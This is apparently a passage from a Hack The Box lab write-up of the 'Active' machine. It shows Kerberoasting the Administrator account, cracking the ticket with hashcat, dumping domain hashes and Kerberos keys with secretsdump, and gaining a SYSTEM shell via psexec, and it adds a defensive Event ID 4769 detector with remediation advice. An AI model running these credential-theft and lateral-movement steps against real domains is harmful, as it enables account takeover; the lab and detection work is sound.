Kerberoasting


During the BloodHound enumeration, it was discovered that the Administrator user is Kerberoastable.

┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ impacket-getuserspns 'active.htb/svc_tgs:GPPstillStandingStrong2k18' -dc-ip $IP -request -request-user administrator    
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/cifs:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2023-01-31 09:41:33.907718             
 
 
 
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$58a5b8df3cab23f48854d9a9f3e4dde2$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

The Administrator user has an SPN configured, active/cifs:445, so a TGS for that service can be requested with any domain credentials and cracked offline.
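From the defender's side, the request above leaves a Kerberos service-ticket event (Event ID 4769) on the DC. The following added example (not part of the original write-up) flags such requests over a few constructed 4769 records: an RC4 (etype 0x17, the hashcat 13100 case) ticket for a user-account SPN is enough to alert on, since the write-up needed only a single request; the key=value export format and the sample values are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample Event ID 4769 records, flattened to key=value lines the way a
# SIEM export might look. Values are made up for this example, not real log data.
SAMPLE_4769 = """\
EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.14.5 Status=0x0
EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=10.10.10.100 Status=0x0
EventID=4769 TargetUserName=alice@ACTIVE.HTB ServiceName=svc_tgs TicketEncryptionType=0x12 IpAddress=10.10.10.50 Status=0x0
EventID=4769 TargetUserName=alice@ACTIVE.HTB ServiceName=svc_tgs TicketEncryptionType=0x17 IpAddress=10.10.10.50 Status=0x6
"""

RC4_HMAC = 0x17  # Kerberos etype 23 (RC4-HMAC): the $krb5tgs$23$ format cracked with hashcat -m 13100


def parse_event(line: str) -> Dict[str, str]:
    """Split one exported record into a field dictionary."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_kerberoast_candidate(ev: Dict[str, str]) -> bool:
    """True for a successful RC4 service ticket issued for a user-account SPN."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False  # failed requests are not issued tickets; handle them separately
    svc = ev.get("ServiceName", "")
    if svc.lower() == "krbtgt" or svc.endswith("$"):
        return False  # TGT renewals and machine-account tickets are routine traffic
    return int(ev.get("TicketEncryptionType", "0x0"), 16) == RC4_HMAC


def find_kerberoasting(log: str) -> List[Dict[str, str]]:
    """Return one finding per flagged record: who requested which SPN account from where."""
    hits = []
    for line in log.splitlines():
        ev = parse_event(line)
        if is_kerberoast_candidate(ev):
            hits.append({"requester": ev["TargetUserName"],
                         "spn_account": ev["ServiceName"],
                         "source": ev["IpAddress"]})
    return hits


if __name__ == "__main__":
    for h in find_kerberoasting(SAMPLE_4769):
        print(f"RC4 TGS for {h['spn_account']} requested by {h['requester']} from {h['source']}")
```

Only the first record is flagged: it matches the write-up, an RC4 ticket for the Administrator SPN requested by svc_tgs. The practical fix is to remove the SPN from the privileged account (or move the service to a dedicated account) and to disable RC4 for the remaining SPN accounts so that tickets come out as AES.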

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ hashcat -a 0 -m 13100 administrator.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$5134df72748f3830097c753f7039c3fb$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:Ticketmaster1968
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...5e8d0f
Time.Started.....: Tue Jan 31 11:59:53 2023 (10 secs)
Time.Estimated...: Tue Jan 31 12:00:03 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   971.4 kH/s (0.44ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10537728/14344385 (73.46%)
Rejected.........: 0/10537728 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Ti2009
Hardware.Mon.#1..: Util: 68%
 
Started: Tue Jan 31 11:59:39 2023
Stopped: Tue Jan 31 12:00:03 2023

Hashcat cracked the TGS-REP hash. The Administrator password is Ticketmaster1968.

Since that is the domain Administrator account, there is not much else to do. It's GG.

Hashdump


┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ impacket-secretsdump 'active.htb/administrator:Ticketmaster1968@dc.active.htb' -target-ip $IP -dc-ip $IP -outputfile hashdump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] target system bootkey: 0xff954ee81ffb63937b563f523caf1d59
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:5c15eb37006fb74c21a5d1e2144b726e:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
active\dc$:aes256-cts-hmac-sha1-96:e81113c5927d93eb12be8c4db6294a2c3e11fe6fa3835bb549392cfb3f5c2e62
active\dc$:aes128-cts-hmac-sha1-96:bd891bc22b7b51aa5ee82f7cdf832960
active\dc$:des-cbc-md5:f74689ab6bcbcd9b
active\dc$:plain_password_hex:a96872372de6af7462f8de5262d671df7f0dc875cd5f9fe2fd405cf042403daff44cd9948be48d00231e24655dad7e2bdcacf73c9f6e849c2c90ad4052738a78eb61684475c3b5d27304c8c48726ae5101e4d355b9e842fabee7e9dd4a2842b429d80ce1d2a4114c7160d25818d4acae3b14a1bf1ee381046b7a10c69a087dbd788b37bf8a35203870e415bbf94512b2a1ed998a65fb7768dd3320237420457c86d15f38d3c9052c418c7ce5294a1babed3b6f9032897118197d7caaa1472f00bbcc3af9f8da22934d504b88b8103f23201aa446e67cfd4178fd9c2ec4bafe22d92c347baa6edb180e10b763c0af2e2d
active\dc$:aad3b435b51404eeaad3b435b51404ee:d63a23e428e6428b200c56e45603919c:::
[*] DefaultPassword 
(unknown user):ROOT#123
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x377bd35be67705f345dabf00d3181e269e0fb1e6
dpapi_userkey:0x7586c391e559565c85cb342d1d24546381f0d5cb
[*] NL$KM 
 0000   CC 6F B8 46 C3 0C 58 05  2F F2 07 2E DA E6 BF 7D   .o.F..X./......}
 0010   60 63 F6 89 E7 0E D5 D5  22 EE 54 DA 63 12 5B B5   `c......".T.c.[.
 0020   D8 DA 0B B7 82 0E 3D E1  9D 7A 03 15 08 5C B0 AE   ......=..z...\..
 0030   EF 63 91 B9 6C 87 65 A8  14 62 95 BC 77 69 77 08   .c..l.e..b..wiw.
nl$km:cc6fb846c30c58052ff2072edae6bf7d6063f689e70ed5d522ee54da63125bb5d8da0bb7820e3de19d7a0315085cb0aeef6391b96c8765a8146295bc77697708
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:5ffb4aaaf9b63dc519eca04aec0e8bed:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b889e0d47d6fe22c8f0463a717f460dc:::
active.htb\svc_tgs:1103:aad3b435b51404eeaad3b435b51404ee:f54f3a1d3c38140684ff4dad029f25b5:::
dc$:1000:aad3b435b51404eeaad3b435b51404ee:d63a23e428e6428b200c56e45603919c:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:003b207686cfdbee91ff9f5671aa10c5d940137da387173507b7ff00648b40d8
administrator:aes128-cts-hmac-sha1-96:48347871a9f7c5346c356d76313668fe
administrator:des-cbc-md5:5891549b31f2c294
krbtgt:aes256-cts-hmac-sha1-96:cd80d318efb2f8752767cd619731b6705cf59df462900fb37310b662c9cf51e9
krbtgt:aes128-cts-hmac-sha1-96:b9a02d7bd319781bc1e0a890f69304c3
krbtgt:des-cbc-md5:9d044f891adf7629
active.htb\svc_tgs:aes256-cts-hmac-sha1-96:d59943174b17c1a4ced88cc24855ef242ad328201126d296bb66aa9588e19b4a
active.htb\svc_tgs:aes128-cts-hmac-sha1-96:f03559334c1111d6f792d74a453d6f31
active.htb\svc_tgs:des-cbc-md5:d6c7eca70862f1d0
dc$:aes256-cts-hmac-sha1-96:e81113c5927d93eb12be8c4db6294a2c3e11fe6fa3835bb549392cfb3f5c2e62
dc$:aes128-cts-hmac-sha1-96:bd891bc22b7b51aa5ee82f7cdf832960
dc$:des-cbc-md5:980810f257a170c4
[*] Cleaning up... 

Domain Level Compromise

impacket-psexec


┌──(kali㉿kali)-[~/archive/htb/labs/active]
└─$ impacket-psexec 'active.htb/administrator:Ticketmaster1968@dc.active.htb' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file oCaCIhEr.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service ZSyS on 10.10.10.100.....
[*] Starting service ZSyS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
DC
 
operable program or batch file.
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Local Area Connection:
 
   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::91dd:26f0:4484:75bc
   Link-local IPv6 Address . . . . . : fe80::91dd:26f0:4484:75bc%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2
 
Tunnel adapter isatap.{73A3C9B3-56C9-47B6-9326-5C0FFB1A8451}:
 
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
